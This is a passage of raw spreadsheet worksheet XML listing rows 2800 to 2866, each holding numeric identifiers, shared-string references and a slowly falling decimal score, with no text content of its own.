    <row r="2800" ht="15.75" customHeight="1">
      <c r="A2800" s="1">
        <v>3134.0</v>
      </c>
      <c r="B2800" s="2">
        <v>3687113.0</v>
      </c>
      <c r="C2800" s="2" t="s">
        <v>2610</v>
      </c>
      <c r="D2800" s="2">
        <v>1.0</v>
      </c>
      <c r="E2800" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2800" s="2">
        <v>0.150925925925926</v>
      </c>
    </row>
    <row r="2801" ht="15.75" customHeight="1">
      <c r="A2801" s="1">
        <v>10564.0</v>
      </c>
      <c r="B2801" s="2">
        <v>1.2864509E7</v>
      </c>
      <c r="C2801" s="2" t="s">
        <v>2611</v>
      </c>
      <c r="D2801" s="2">
        <v>1.0</v>
      </c>
      <c r="E2801" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2801" s="2">
        <v>0.150925925925926</v>
      </c>
    </row>
    <row r="2802" ht="15.75" customHeight="1">
      <c r="A2802" s="1">
        <v>9853.0</v>
      </c>
      <c r="B2802" s="2">
        <v>5.6696428E7</v>
      </c>
      <c r="C2802" s="2" t="s">
        <v>2612</v>
      </c>
      <c r="D2802" s="2">
        <v>1.0</v>
      </c>
      <c r="E2802" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2802" s="2">
        <v>0.1507936507936509</v>
      </c>
    </row>
    <row r="2803" ht="15.75" customHeight="1">
      <c r="A2803" s="1">
        <v>9998.0</v>
      </c>
      <c r="B2803" s="2">
        <v>5.7007343E7</v>
      </c>
      <c r="C2803" s="2" t="s">
        <v>2613</v>
      </c>
      <c r="D2803" s="2">
        <v>1.0</v>
      </c>
      <c r="E2803" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2803" s="2">
        <v>0.1507936507936508</v>
      </c>
    </row>
    <row r="2804" ht="15.75" customHeight="1">
      <c r="A2804" s="1">
        <v>87.0</v>
      </c>
      <c r="B2804" s="2">
        <v>1.2023328E7</v>
      </c>
      <c r="C2804" s="2" t="s">
        <v>2614</v>
      </c>
      <c r="D2804" s="2">
        <v>1.0</v>
      </c>
      <c r="E2804" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2804" s="2">
        <v>0.1506734006734007</v>
      </c>
    </row>
    <row r="2805" ht="15.75" customHeight="1">
      <c r="A2805" s="1">
        <v>17609.0</v>
      </c>
      <c r="B2805" s="2">
        <v>5.0360815E7</v>
      </c>
      <c r="C2805" s="2" t="s">
        <v>2615</v>
      </c>
      <c r="D2805" s="2">
        <v>1.0</v>
      </c>
      <c r="E2805" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2805" s="2">
        <v>0.1506734006734007</v>
      </c>
    </row>
    <row r="2806" ht="15.75" customHeight="1">
      <c r="A2806" s="1">
        <v>1746.0</v>
      </c>
      <c r="B2806" s="2">
        <v>2.8818039E7</v>
      </c>
      <c r="C2806" s="2" t="s">
        <v>2616</v>
      </c>
      <c r="D2806" s="2">
        <v>1.0</v>
      </c>
      <c r="E2806" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2806" s="2">
        <v>0.1503831417624521</v>
      </c>
    </row>
    <row r="2807" ht="15.75" customHeight="1">
      <c r="A2807" s="1">
        <v>13741.0</v>
      </c>
      <c r="B2807" s="2">
        <v>3.6451717E7</v>
      </c>
      <c r="C2807" s="2" t="s">
        <v>2617</v>
      </c>
      <c r="D2807" s="2">
        <v>1.0</v>
      </c>
      <c r="E2807" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2807" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="2808" ht="15.75" customHeight="1">
      <c r="A2808" s="1">
        <v>14178.0</v>
      </c>
      <c r="B2808" s="2">
        <v>3.8076249E7</v>
      </c>
      <c r="C2808" s="2" t="s">
        <v>2618</v>
      </c>
      <c r="D2808" s="2">
        <v>1.0</v>
      </c>
      <c r="E2808" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2808" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="2809" ht="15.75" customHeight="1">
      <c r="A2809" s="1">
        <v>18730.0</v>
      </c>
      <c r="B2809" s="2">
        <v>5.3705334E7</v>
      </c>
      <c r="C2809" s="2" t="s">
        <v>2619</v>
      </c>
      <c r="D2809" s="2">
        <v>1.0</v>
      </c>
      <c r="E2809" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2809" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="2810" ht="15.75" customHeight="1">
      <c r="A2810" s="1">
        <v>28792.0</v>
      </c>
      <c r="B2810" s="2">
        <v>2.8532084E7</v>
      </c>
      <c r="C2810" s="2" t="s">
        <v>2620</v>
      </c>
      <c r="D2810" s="2">
        <v>1.0</v>
      </c>
      <c r="E2810" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2810" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="2811" ht="15.75" customHeight="1">
      <c r="A2811" s="1">
        <v>29106.0</v>
      </c>
      <c r="B2811" s="2">
        <v>3.0432801E7</v>
      </c>
      <c r="C2811" s="2" t="s">
        <v>2621</v>
      </c>
      <c r="D2811" s="2">
        <v>1.0</v>
      </c>
      <c r="E2811" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2811" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="2812" ht="15.75" customHeight="1">
      <c r="A2812" s="1">
        <v>5116.0</v>
      </c>
      <c r="B2812" s="2">
        <v>4.4541263E7</v>
      </c>
      <c r="C2812" s="2" t="s">
        <v>2622</v>
      </c>
      <c r="D2812" s="2">
        <v>1.0</v>
      </c>
      <c r="E2812" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2812" s="2">
        <v>0.149923896499239</v>
      </c>
    </row>
    <row r="2813" ht="15.75" customHeight="1">
      <c r="A2813" s="1">
        <v>15012.0</v>
      </c>
      <c r="B2813" s="2">
        <v>4.1500907E7</v>
      </c>
      <c r="C2813" s="2" t="s">
        <v>2623</v>
      </c>
      <c r="D2813" s="2">
        <v>1.0</v>
      </c>
      <c r="E2813" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2813" s="2">
        <v>0.1491228070175439</v>
      </c>
    </row>
    <row r="2814" ht="15.75" customHeight="1">
      <c r="A2814" s="1">
        <v>17934.0</v>
      </c>
      <c r="B2814" s="2">
        <v>5.1238487E7</v>
      </c>
      <c r="C2814" s="2" t="s">
        <v>2624</v>
      </c>
      <c r="D2814" s="2">
        <v>1.0</v>
      </c>
      <c r="E2814" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2814" s="2">
        <v>0.148989898989899</v>
      </c>
    </row>
    <row r="2815" ht="15.75" customHeight="1">
      <c r="A2815" s="1">
        <v>6245.0</v>
      </c>
      <c r="B2815" s="2">
        <v>4.8099257E7</v>
      </c>
      <c r="C2815" s="2" t="s">
        <v>2625</v>
      </c>
      <c r="D2815" s="2">
        <v>1.0</v>
      </c>
      <c r="E2815" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2815" s="2">
        <v>0.1489533011272142</v>
      </c>
    </row>
    <row r="2816" ht="15.75" customHeight="1">
      <c r="A2816" s="1">
        <v>32208.0</v>
      </c>
      <c r="B2816" s="2">
        <v>5483665.0</v>
      </c>
      <c r="C2816" s="2" t="s">
        <v>2626</v>
      </c>
      <c r="D2816" s="2">
        <v>1.0</v>
      </c>
      <c r="E2816" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2816" s="2">
        <v>0.1489533011272142</v>
      </c>
    </row>
    <row r="2817" ht="15.75" customHeight="1">
      <c r="A2817" s="1">
        <v>8906.0</v>
      </c>
      <c r="B2817" s="2">
        <v>5.4795425E7</v>
      </c>
      <c r="C2817" s="2" t="s">
        <v>2627</v>
      </c>
      <c r="D2817" s="2">
        <v>1.0</v>
      </c>
      <c r="E2817" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2817" s="2">
        <v>0.1488603988603989</v>
      </c>
    </row>
    <row r="2818" ht="15.75" customHeight="1">
      <c r="A2818" s="1">
        <v>22.0</v>
      </c>
      <c r="B2818" s="2">
        <v>1.0472514E7</v>
      </c>
      <c r="C2818" s="2" t="s">
        <v>2628</v>
      </c>
      <c r="D2818" s="2">
        <v>1.0</v>
      </c>
      <c r="E2818" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2818" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="2819" ht="15.75" customHeight="1">
      <c r="A2819" s="1">
        <v>9148.0</v>
      </c>
      <c r="B2819" s="2">
        <v>5.5265279E7</v>
      </c>
      <c r="C2819" s="2" t="s">
        <v>2629</v>
      </c>
      <c r="D2819" s="2">
        <v>1.0</v>
      </c>
      <c r="E2819" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2819" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="2820" ht="15.75" customHeight="1">
      <c r="A2820" s="1">
        <v>16353.0</v>
      </c>
      <c r="B2820" s="2">
        <v>4.6101672E7</v>
      </c>
      <c r="C2820" s="2" t="s">
        <v>2630</v>
      </c>
      <c r="D2820" s="2">
        <v>1.0</v>
      </c>
      <c r="E2820" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2820" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="2821" ht="15.75" customHeight="1">
      <c r="A2821" s="1">
        <v>17372.0</v>
      </c>
      <c r="B2821" s="2">
        <v>4.9501234E7</v>
      </c>
      <c r="C2821" s="2" t="s">
        <v>2631</v>
      </c>
      <c r="D2821" s="2">
        <v>1.0</v>
      </c>
      <c r="E2821" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2821" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="2822" ht="15.75" customHeight="1">
      <c r="A2822" s="1">
        <v>18483.0</v>
      </c>
      <c r="B2822" s="2">
        <v>5.2890089E7</v>
      </c>
      <c r="C2822" s="2" t="s">
        <v>2632</v>
      </c>
      <c r="D2822" s="2">
        <v>1.0</v>
      </c>
      <c r="E2822" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2822" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="2823" ht="15.75" customHeight="1">
      <c r="A2823" s="1">
        <v>3895.0</v>
      </c>
      <c r="B2823" s="2">
        <v>4.0430423E7</v>
      </c>
      <c r="C2823" s="2" t="s">
        <v>2633</v>
      </c>
      <c r="D2823" s="2">
        <v>1.0</v>
      </c>
      <c r="E2823" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2823" s="2">
        <v>0.1484674329501916</v>
      </c>
    </row>
    <row r="2824" ht="15.75" customHeight="1">
      <c r="A2824" s="1">
        <v>6094.0</v>
      </c>
      <c r="B2824" s="2">
        <v>4.7702584E7</v>
      </c>
      <c r="C2824" s="2" t="s">
        <v>2634</v>
      </c>
      <c r="D2824" s="2">
        <v>1.0</v>
      </c>
      <c r="E2824" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2824" s="2">
        <v>0.1484517304189436</v>
      </c>
    </row>
    <row r="2825" ht="15.75" customHeight="1">
      <c r="A2825" s="1">
        <v>8464.0</v>
      </c>
      <c r="B2825" s="2">
        <v>5.4004937E7</v>
      </c>
      <c r="C2825" s="2" t="s">
        <v>2635</v>
      </c>
      <c r="D2825" s="2">
        <v>1.0</v>
      </c>
      <c r="E2825" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2825" s="2">
        <v>0.1484517304189436</v>
      </c>
    </row>
    <row r="2826" ht="15.75" customHeight="1">
      <c r="A2826" s="1">
        <v>15734.0</v>
      </c>
      <c r="B2826" s="2">
        <v>4.4078538E7</v>
      </c>
      <c r="C2826" s="2" t="s">
        <v>2636</v>
      </c>
      <c r="D2826" s="2">
        <v>1.0</v>
      </c>
      <c r="E2826" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2826" s="2">
        <v>0.1484245439469321</v>
      </c>
    </row>
    <row r="2827" ht="15.75" customHeight="1">
      <c r="A2827" s="1">
        <v>5167.0</v>
      </c>
      <c r="B2827" s="2">
        <v>4.4750867E7</v>
      </c>
      <c r="C2827" s="2" t="s">
        <v>2637</v>
      </c>
      <c r="D2827" s="2">
        <v>1.0</v>
      </c>
      <c r="E2827" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2827" s="2">
        <v>0.1484126984126985</v>
      </c>
    </row>
    <row r="2828" ht="15.75" customHeight="1">
      <c r="A2828" s="1">
        <v>12249.0</v>
      </c>
      <c r="B2828" s="2">
        <v>2.7911797E7</v>
      </c>
      <c r="C2828" s="2" t="s">
        <v>2638</v>
      </c>
      <c r="D2828" s="2">
        <v>1.0</v>
      </c>
      <c r="E2828" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2828" s="2">
        <v>0.1479076479076479</v>
      </c>
    </row>
    <row r="2829" ht="15.75" customHeight="1">
      <c r="A2829" s="1">
        <v>9800.0</v>
      </c>
      <c r="B2829" s="2">
        <v>5.6555287E7</v>
      </c>
      <c r="C2829" s="2" t="s">
        <v>2639</v>
      </c>
      <c r="D2829" s="2">
        <v>1.0</v>
      </c>
      <c r="E2829" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2829" s="2">
        <v>0.1478978978978979</v>
      </c>
    </row>
    <row r="2830" ht="15.75" customHeight="1">
      <c r="A2830" s="1">
        <v>9925.0</v>
      </c>
      <c r="B2830" s="2">
        <v>5.6824666E7</v>
      </c>
      <c r="C2830" s="2" t="s">
        <v>2640</v>
      </c>
      <c r="D2830" s="2">
        <v>1.0</v>
      </c>
      <c r="E2830" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2830" s="2">
        <v>0.1478632478632479</v>
      </c>
    </row>
    <row r="2831" ht="15.75" customHeight="1">
      <c r="A2831" s="1">
        <v>12908.0</v>
      </c>
      <c r="B2831" s="2">
        <v>3.2155868E7</v>
      </c>
      <c r="C2831" s="2" t="s">
        <v>2641</v>
      </c>
      <c r="D2831" s="2">
        <v>1.0</v>
      </c>
      <c r="E2831" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2831" s="2">
        <v>0.1478632478632479</v>
      </c>
    </row>
    <row r="2832" ht="15.75" customHeight="1">
      <c r="A2832" s="1">
        <v>2748.0</v>
      </c>
      <c r="B2832" s="2">
        <v>3.5049248E7</v>
      </c>
      <c r="C2832" s="2" t="s">
        <v>2642</v>
      </c>
      <c r="D2832" s="2">
        <v>1.0</v>
      </c>
      <c r="E2832" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2832" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="2833" ht="15.75" customHeight="1">
      <c r="A2833" s="1">
        <v>9355.0</v>
      </c>
      <c r="B2833" s="2">
        <v>5.5676345E7</v>
      </c>
      <c r="C2833" s="2" t="s">
        <v>2643</v>
      </c>
      <c r="D2833" s="2">
        <v>1.0</v>
      </c>
      <c r="E2833" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2833" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="2834" ht="15.75" customHeight="1">
      <c r="A2834" s="1">
        <v>9715.0</v>
      </c>
      <c r="B2834" s="2">
        <v>5.6399079E7</v>
      </c>
      <c r="C2834" s="2" t="s">
        <v>2644</v>
      </c>
      <c r="D2834" s="2">
        <v>1.0</v>
      </c>
      <c r="E2834" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2834" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="2835" ht="15.75" customHeight="1">
      <c r="A2835" s="1">
        <v>27016.0</v>
      </c>
      <c r="B2835" s="2">
        <v>2.0025906E7</v>
      </c>
      <c r="C2835" s="2" t="s">
        <v>2645</v>
      </c>
      <c r="D2835" s="2">
        <v>1.0</v>
      </c>
      <c r="E2835" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2835" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="2836" ht="15.75" customHeight="1">
      <c r="A2836" s="1">
        <v>8478.0</v>
      </c>
      <c r="B2836" s="2">
        <v>5.4015257E7</v>
      </c>
      <c r="C2836" s="2" t="s">
        <v>2646</v>
      </c>
      <c r="D2836" s="2">
        <v>1.0</v>
      </c>
      <c r="E2836" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2836" s="2">
        <v>0.1478494623655914</v>
      </c>
    </row>
    <row r="2837" ht="15.75" customHeight="1">
      <c r="A2837" s="1">
        <v>8570.0</v>
      </c>
      <c r="B2837" s="2">
        <v>5.4186723E7</v>
      </c>
      <c r="C2837" s="2" t="s">
        <v>2647</v>
      </c>
      <c r="D2837" s="2">
        <v>1.0</v>
      </c>
      <c r="E2837" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2837" s="2">
        <v>0.1478494623655914</v>
      </c>
    </row>
    <row r="2838" ht="15.75" customHeight="1">
      <c r="A2838" s="1">
        <v>19508.0</v>
      </c>
      <c r="B2838" s="2">
        <v>5.5927641E7</v>
      </c>
      <c r="C2838" s="2" t="s">
        <v>2648</v>
      </c>
      <c r="D2838" s="2">
        <v>1.0</v>
      </c>
      <c r="E2838" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2838" s="2">
        <v>0.1478494623655914</v>
      </c>
    </row>
    <row r="2839" ht="15.75" customHeight="1">
      <c r="A2839" s="1">
        <v>260.0</v>
      </c>
      <c r="B2839" s="2">
        <v>1.5146909E7</v>
      </c>
      <c r="C2839" s="2" t="s">
        <v>2649</v>
      </c>
      <c r="D2839" s="2">
        <v>1.0</v>
      </c>
      <c r="E2839" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2839" s="2">
        <v>0.1478342749529191</v>
      </c>
    </row>
    <row r="2840" ht="15.75" customHeight="1">
      <c r="A2840" s="1">
        <v>17534.0</v>
      </c>
      <c r="B2840" s="2">
        <v>5.0112937E7</v>
      </c>
      <c r="C2840" s="2" t="s">
        <v>2650</v>
      </c>
      <c r="D2840" s="2">
        <v>1.0</v>
      </c>
      <c r="E2840" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2840" s="2">
        <v>0.1473765432098766</v>
      </c>
    </row>
    <row r="2841" ht="15.75" customHeight="1">
      <c r="A2841" s="1">
        <v>913.0</v>
      </c>
      <c r="B2841" s="2">
        <v>2.2188117E7</v>
      </c>
      <c r="C2841" s="2" t="s">
        <v>2651</v>
      </c>
      <c r="D2841" s="2">
        <v>1.0</v>
      </c>
      <c r="E2841" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2841" s="2">
        <v>0.1472663139329807</v>
      </c>
    </row>
    <row r="2842" ht="15.75" customHeight="1">
      <c r="A2842" s="1">
        <v>3755.0</v>
      </c>
      <c r="B2842" s="2">
        <v>3.9740153E7</v>
      </c>
      <c r="C2842" s="2" t="s">
        <v>2652</v>
      </c>
      <c r="D2842" s="2">
        <v>1.0</v>
      </c>
      <c r="E2842" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2842" s="2">
        <v>0.1472663139329807</v>
      </c>
    </row>
    <row r="2843" ht="15.75" customHeight="1">
      <c r="A2843" s="1">
        <v>27546.0</v>
      </c>
      <c r="B2843" s="2">
        <v>2.232777E7</v>
      </c>
      <c r="C2843" s="2" t="s">
        <v>2653</v>
      </c>
      <c r="D2843" s="2">
        <v>1.0</v>
      </c>
      <c r="E2843" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2843" s="2">
        <v>0.1472222222222223</v>
      </c>
    </row>
    <row r="2844" ht="15.75" customHeight="1">
      <c r="A2844" s="1">
        <v>6217.0</v>
      </c>
      <c r="B2844" s="2">
        <v>4.8015717E7</v>
      </c>
      <c r="C2844" s="2" t="s">
        <v>2654</v>
      </c>
      <c r="D2844" s="2">
        <v>1.0</v>
      </c>
      <c r="E2844" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2844" s="2">
        <v>0.1466302367941713</v>
      </c>
    </row>
    <row r="2845" ht="15.75" customHeight="1">
      <c r="A2845" s="1">
        <v>10800.0</v>
      </c>
      <c r="B2845" s="2">
        <v>1.5797392E7</v>
      </c>
      <c r="C2845" s="2" t="s">
        <v>2655</v>
      </c>
      <c r="D2845" s="2">
        <v>1.0</v>
      </c>
      <c r="E2845" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2845" s="2">
        <v>0.1466302367941713</v>
      </c>
    </row>
    <row r="2846" ht="15.75" customHeight="1">
      <c r="A2846" s="1">
        <v>14391.0</v>
      </c>
      <c r="B2846" s="2">
        <v>3.9086537E7</v>
      </c>
      <c r="C2846" s="2" t="s">
        <v>2656</v>
      </c>
      <c r="D2846" s="2">
        <v>1.0</v>
      </c>
      <c r="E2846" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2846" s="2">
        <v>0.1463560334528077</v>
      </c>
    </row>
    <row r="2847" ht="15.75" customHeight="1">
      <c r="A2847" s="1">
        <v>16488.0</v>
      </c>
      <c r="B2847" s="2">
        <v>4.6539674E7</v>
      </c>
      <c r="C2847" s="2" t="s">
        <v>2657</v>
      </c>
      <c r="D2847" s="2">
        <v>1.0</v>
      </c>
      <c r="E2847" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2847" s="2">
        <v>0.1462418300653595</v>
      </c>
    </row>
    <row r="2848" ht="15.75" customHeight="1">
      <c r="A2848" s="1">
        <v>14356.0</v>
      </c>
      <c r="B2848" s="2">
        <v>3.8933611E7</v>
      </c>
      <c r="C2848" s="2" t="s">
        <v>2658</v>
      </c>
      <c r="D2848" s="2">
        <v>1.0</v>
      </c>
      <c r="E2848" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2848" s="2">
        <v>0.146057347670251</v>
      </c>
    </row>
    <row r="2849" ht="15.75" customHeight="1">
      <c r="A2849" s="1">
        <v>9496.0</v>
      </c>
      <c r="B2849" s="2">
        <v>5.5917992E7</v>
      </c>
      <c r="C2849" s="2" t="s">
        <v>2659</v>
      </c>
      <c r="D2849" s="2">
        <v>1.0</v>
      </c>
      <c r="E2849" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2849" s="2">
        <v>0.1460573476702509</v>
      </c>
    </row>
    <row r="2850" ht="15.75" customHeight="1">
      <c r="A2850" s="1">
        <v>2193.0</v>
      </c>
      <c r="B2850" s="2">
        <v>3.1954861E7</v>
      </c>
      <c r="C2850" s="2" t="s">
        <v>2660</v>
      </c>
      <c r="D2850" s="2">
        <v>1.0</v>
      </c>
      <c r="E2850" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2850" s="2">
        <v>0.1459510357815443</v>
      </c>
    </row>
    <row r="2851" ht="15.75" customHeight="1">
      <c r="A2851" s="1">
        <v>429.0</v>
      </c>
      <c r="B2851" s="2">
        <v>1.6962442E7</v>
      </c>
      <c r="C2851" s="2" t="s">
        <v>2661</v>
      </c>
      <c r="D2851" s="2">
        <v>1.0</v>
      </c>
      <c r="E2851" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2851" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="2852" ht="15.75" customHeight="1">
      <c r="A2852" s="1">
        <v>719.0</v>
      </c>
      <c r="B2852" s="2">
        <v>2.0654755E7</v>
      </c>
      <c r="C2852" s="2" t="s">
        <v>2662</v>
      </c>
      <c r="D2852" s="2">
        <v>1.0</v>
      </c>
      <c r="E2852" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2852" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="2853" ht="15.75" customHeight="1">
      <c r="A2853" s="1">
        <v>3697.0</v>
      </c>
      <c r="B2853" s="2">
        <v>3.9540718E7</v>
      </c>
      <c r="C2853" s="2" t="s">
        <v>2663</v>
      </c>
      <c r="D2853" s="2">
        <v>1.0</v>
      </c>
      <c r="E2853" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2853" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="2854" ht="15.75" customHeight="1">
      <c r="A2854" s="1">
        <v>4304.0</v>
      </c>
      <c r="B2854" s="2">
        <v>4.1956619E7</v>
      </c>
      <c r="C2854" s="2" t="s">
        <v>2664</v>
      </c>
      <c r="D2854" s="2">
        <v>1.0</v>
      </c>
      <c r="E2854" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2854" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="2855" ht="15.75" customHeight="1">
      <c r="A2855" s="1">
        <v>16017.0</v>
      </c>
      <c r="B2855" s="2">
        <v>4.5017423E7</v>
      </c>
      <c r="C2855" s="2" t="s">
        <v>2665</v>
      </c>
      <c r="D2855" s="2">
        <v>1.0</v>
      </c>
      <c r="E2855" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2855" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="2856" ht="15.75" customHeight="1">
      <c r="A2856" s="1">
        <v>18071.0</v>
      </c>
      <c r="B2856" s="2">
        <v>5.1614256E7</v>
      </c>
      <c r="C2856" s="2" t="s">
        <v>2666</v>
      </c>
      <c r="D2856" s="2">
        <v>1.0</v>
      </c>
      <c r="E2856" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2856" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="2857" ht="15.75" customHeight="1">
      <c r="A2857" s="1">
        <v>19992.0</v>
      </c>
      <c r="B2857" s="2">
        <v>5.7648006E7</v>
      </c>
      <c r="C2857" s="2" t="s">
        <v>2667</v>
      </c>
      <c r="D2857" s="2">
        <v>1.0</v>
      </c>
      <c r="E2857" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2857" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="2858" ht="15.75" customHeight="1">
      <c r="A2858" s="1">
        <v>5823.0</v>
      </c>
      <c r="B2858" s="2">
        <v>4.6867766E7</v>
      </c>
      <c r="C2858" s="2" t="s">
        <v>2668</v>
      </c>
      <c r="D2858" s="2">
        <v>1.0</v>
      </c>
      <c r="E2858" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2858" s="2">
        <v>0.1456639566395664</v>
      </c>
    </row>
    <row r="2859" ht="15.75" customHeight="1">
      <c r="A2859" s="1">
        <v>22409.0</v>
      </c>
      <c r="B2859" s="2">
        <v>3.578999E7</v>
      </c>
      <c r="C2859" s="2" t="s">
        <v>2669</v>
      </c>
      <c r="D2859" s="2">
        <v>1.0</v>
      </c>
      <c r="E2859" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2859" s="2">
        <v>0.1456228956228957</v>
      </c>
    </row>
    <row r="2860" ht="15.75" customHeight="1">
      <c r="A2860" s="1">
        <v>29858.0</v>
      </c>
      <c r="B2860" s="2">
        <v>3.5789989E7</v>
      </c>
      <c r="C2860" s="2" t="s">
        <v>2669</v>
      </c>
      <c r="D2860" s="2">
        <v>1.0</v>
      </c>
      <c r="E2860" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2860" s="2">
        <v>0.1456228956228957</v>
      </c>
    </row>
    <row r="2861" ht="15.75" customHeight="1">
      <c r="A2861" s="1">
        <v>2714.0</v>
      </c>
      <c r="B2861" s="2">
        <v>3.490313E7</v>
      </c>
      <c r="C2861" s="2" t="s">
        <v>2670</v>
      </c>
      <c r="D2861" s="2">
        <v>1.0</v>
      </c>
      <c r="E2861" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2861" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="2862" ht="15.75" customHeight="1">
      <c r="A2862" s="1">
        <v>5069.0</v>
      </c>
      <c r="B2862" s="2">
        <v>4.4388645E7</v>
      </c>
      <c r="C2862" s="2" t="s">
        <v>2671</v>
      </c>
      <c r="D2862" s="2">
        <v>1.0</v>
      </c>
      <c r="E2862" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2862" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="2863" ht="15.75" customHeight="1">
      <c r="A2863" s="1">
        <v>10146.0</v>
      </c>
      <c r="B2863" s="2">
        <v>5.7309062E7</v>
      </c>
      <c r="C2863" s="2" t="s">
        <v>2672</v>
      </c>
      <c r="D2863" s="2">
        <v>1.0</v>
      </c>
      <c r="E2863" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2863" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="2864" ht="15.75" customHeight="1">
      <c r="A2864" s="1">
        <v>6642.0</v>
      </c>
      <c r="B2864" s="2">
        <v>4.90738E7</v>
      </c>
      <c r="C2864" s="2" t="s">
        <v>2673</v>
      </c>
      <c r="D2864" s="2">
        <v>1.0</v>
      </c>
      <c r="E2864" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2864" s="2">
        <v>0.1453703703703704</v>
      </c>
    </row>
    <row r="2865" ht="15.75" customHeight="1">
      <c r="A2865" s="1">
        <v>9704.0</v>
      </c>
      <c r="B2865" s="2">
        <v>5.6378428E7</v>
      </c>
      <c r="C2865" s="2" t="s">
        <v>2674</v>
      </c>
      <c r="D2865" s="2">
        <v>1.0</v>
      </c>
      <c r="E2865" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2865" s="2">
        <v>0.1453703703703704</v>
      </c>
    </row>
    <row r="2866" ht="15.75" customHeight="1">
      <c r="A2866" s="1">
        <v>15472.0</v>
      </c>
      <c r="B2866" s="2">
        <v>4.313517E7</v>
      </c>
      <c r="C2866" s="2" t="s">
        <v>2675</v>
      </c>
      <c r="D2866" s="2">
        <v>1.0</v>
      </c>
      <c r="E2866" s="3" t="s">
        <v>2353</v>
      </c>
      <c r="F2866" s="2">
        <v>0.1453703703703704</v>
      </c>
    </row>
